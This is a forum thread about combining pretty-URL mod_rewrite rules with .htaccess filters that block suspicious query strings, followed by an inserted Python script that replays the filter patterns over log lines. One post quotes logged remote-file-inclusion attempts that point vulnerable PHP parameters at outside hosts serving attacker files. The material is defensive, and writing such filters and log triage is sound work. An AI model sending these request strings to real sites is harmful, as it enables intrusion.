[SOLVED].htacces URL Filtering combined with Pretty URLS

Signex

[SOLVED].htacces URL Filtering combined with Pretty URLS

Post by Signex »

I have a website on which I'm using mod_rewrite for pretty URLs, using this code:


Options +FollowSymLinks
RewriteEngine on
RewriteBase /

# 301 Redirect all requests that don't contain a dot or trailing slash to
# include a trailing slash
RewriteCond %{REQUEST_URI} !/$
RewriteCond %{REQUEST_URI} !\.
RewriteRule ^(.*) %{REQUEST_URI}/ [R=301,L]

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f [NC]
RewriteCond %{REQUEST_FILENAME} !-d [NC]
RewriteRule ^(.+)$ index.php?page=$1 [QSA]

This method works fine, but now I want to include some URL filtering to block potential hackers. I want to include this code:


#IF the URI contains a "http:"
RewriteCond %{REQUEST_URI} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{REQUEST_URI} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{REQUEST_URI} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{REQUEST_URI} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{REQUEST_URI} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{REQUEST_URI} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) 

RewriteRule ^.*$ - [F,L] 

So basically I end up with this when I combine both:


Options +FollowSymLinks
RewriteEngine on
RewriteBase /

#IF the URI contains a "http:"
RewriteCond %{REQUEST_URI} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{REQUEST_URI} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{REQUEST_URI} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{REQUEST_URI} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{REQUEST_URI} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{REQUEST_URI} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

RewriteRule ^.*$ - [F,L] 

# 301 Redirect all requests that don't contain a dot or trailing slash to
# include a trailing slash
RewriteCond %{REQUEST_URI} !/$
RewriteCond %{REQUEST_URI} !\.
RewriteRule ^(.*) %{REQUEST_URI}/ [R=301,L]

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f [NC]
RewriteCond %{REQUEST_FILENAME} !-d [NC]
RewriteRule ^(.+)$ index.php?page=$1 [QSA]

Pretty URLs still work, but the URL filtering doesn't; it gives 404 errors instead of the 403 errors it should. If I try only the URL filtering on a website which doesn't use pretty-URL mod_rewrite, the URL filtering works fine.

Any ideas on how I can get both URL filtering and pretty URLs to work?

Thank You.
Last edited by Signex on Tue Sep 25, 2007 5:24 pm, edited 1 time in total.
Signex

Re: .htacces URL Filtering combined with Pretty URLS

Post by Signex »

Solved in this topic: http://forum.cmsmadesimple.org/index.ph ... 45.15.html

Using this code, pretty URLs and filtering work:


ErrorDocument 403 /forbidden403.html

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

#IF the URI contains a "http:"
RewriteCond %{QUERY_STRING} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{QUERY_STRING} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{QUERY_STRING} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) 

RewriteRule ^.*$ - [F,L] 

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule ^(.+)$ index.php?page=$1 [QSA]
kermit
Power Poster
Posts: 693
Joined: Thu Jan 26, 2006 11:46 am

Re: .htacces URL Filtering combined with Pretty URLS

Post by kermit »

Signex wrote: Solved in this topic: http://forum.cmsmadesimple.org/index.ph ... 45.15.html

Using this code, pretty URLs and filtering work:


ErrorDocument 403 /forbidden403.html

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

#IF the URI contains a "http:"
RewriteCond %{QUERY_STRING} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{QUERY_STRING} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{QUERY_STRING} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) 

RewriteRule ^.*$ - [F,L] 

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule ^(.+)$ index.php?page=$1 [QSA]

Attached is an example of how effective these few lines are...

Even if there aren't any exploitable bugs in CMSMS, there's no good reason not to add the URL filtering to your .htaccess file..
Attachments
urlfiltering-results.png
Last edited by kermit on Thu Nov 22, 2007 1:40 pm, edited 1 time in total.
eternity (n); 1. infinite time, 2. a seemingly long or endless time, 3. the length of time it takes a frozen pizza to cook when you're starving.
4,930,000,000 (n); 1. a very large number, 2. the approximate world population in 1986 when Microsoft Corp issued its IPO. 3. Microsoft's net profit (USD) for the quarter (3 months) ending 31 March 2007.
CMSMS migration and setup services | Hosting with CMSMS installed and ready to go | PM me for Info
Pierre M.

Re: .htacces URL Filtering combined with Pretty URLS

Post by Pierre M. »

Hello,
kermit wrote: Attached is an example of how effective these few lines are...
The image shows 403s in the logs. So your rules are effective; yes, they block requests. I'd like to see against what they are effective: what are the naughty URLs they have denied access to, before they reach PHP/CMSms?
kermit wrote: there's no good reason not to add the URL filtering to your .htaccess file..
Amen.

Pierre M.
kermit
Power Poster
Posts: 693
Joined: Thu Jan 26, 2006 11:46 am

Re: .htacces URL Filtering combined with Pretty URLS

Post by kermit »

Pierre M. wrote: I'd like to see against what they are effective: what are the naughty URLs they have denied access to, before they reach PHP/CMSms?

Most of those were all in about 20 minutes' time... they were all one of these two (or variations of them):


218.232.75.175 - - [20/Nov/2007:18:19:49 -0800] "GET /include/main.php?config[search_disp]=true&include_dir=http://1-content.com/safe.gif? HTTP/1.1" 403 666 "-" "libwww-perl/5.79"
213.192.241.64 - - [20/Nov/2007:21:49:19 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 403 666 "-" "libwww-perl/5.803"

Filtering on the user agent libwww-perl would be nearly as effective (and would also nail some 'bad' bots in the process)... these clowns can deface thousands of websites in a matter of minutes, yet they have yet to master the art of faking user-agent strings to get around those types of filters?!?!
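The thread's filter rules, replayed over log lines like the ones kermit posted, as an added example (not code from the thread or from CMSMS): it parses Apache combined-format lines, tests the path and the query string separately against the six RewriteCond patterns, and so shows why the solved version matches %{QUERY_STRING} while conditions on %{REQUEST_URI} never see the query string at all. The sample log lines are constructed (RFC 5737 addresses, .invalid hostnames); the libwww-perl flag reflects kermit's user-agent observation.

```python
import re

# The six RewriteCond patterns from the thread, as Python regexes. Apache's
# RewriteCond is an unanchored PCRE search; only the <script> one has [NC].
URL_FILTERS = [
    ("http:", re.compile(r"http\:")),
    ("[", re.compile(r"\[")),
    ("]", re.compile(r"\]")),
    ("<script>", re.compile(r"(\<|%3C).*script.*(\>|%3E)", re.IGNORECASE)),
    ("GLOBALS", re.compile(r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})")),
    ("_REQUEST", re.compile(r"_REQUEST(=|\[|\%[0-9A-Z]{0,2})")),
]
# Apache combined log format; only the fields needed for triage are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def matched_filters(subject):
    # Names of the RewriteCond patterns that would match this string.
    return [name for name, rx in URL_FILTERS if rx.search(subject)]

def evaluate(target):
    # Mirror Apache: %{REQUEST_URI} is the path only; %{QUERY_STRING} is
    # everything after the first '?', so the two variants see different text.
    path, _, query = target.partition("?")
    return {"REQUEST_URI": matched_filters(path),
            "QUERY_STRING": matched_filters(query)}

def triage_log(lines):
    # Parse each log line and report which rule variant would have blocked it.
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        v = evaluate(m["target"])
        out.append({"ip": m["ip"], "status": m["status"],
                    "hits": v["QUERY_STRING"],
                    "blocked_by_query_string": bool(v["QUERY_STRING"]),
                    "blocked_by_request_uri": bool(v["REQUEST_URI"]),
                    "libwww_perl": m["ua"].startswith("libwww-perl")})
    return out

# Constructed sample lines modelled on those posted in the thread (not real traffic).
SAMPLE_LOG = [
    '203.0.113.10 - - [20/Nov/2007:18:19:49 -0800] "GET /include/main.php?config[search_disp]=true&include_dir=http://evil.invalid/safe.gif? HTTP/1.1" 403 666 "-" "libwww-perl/5.79"',
    '203.0.113.11 - - [20/Nov/2007:18:20:03 -0800] "GET /about/contact/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [20/Nov/2007:21:49:19 -0800] "GET /news/2007/?_REQUEST[x]=1 HTTP/1.1" 403 666 "-" "libwww-perl/5.803"',
]
```

Running `triage_log(SAMPLE_LOG)` shows the first and third lines blocked only when the conditions are tested against the query string, and the ordinary pretty URL untouched by either variant.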
Pierre M.

Re: [SOLVED].htacces URL Filtering combined with Pretty URLS

Post by Pierre M. »

Thank you kermit for the feedback.
They don't fake the user agent: LOL :-D

Pierre M.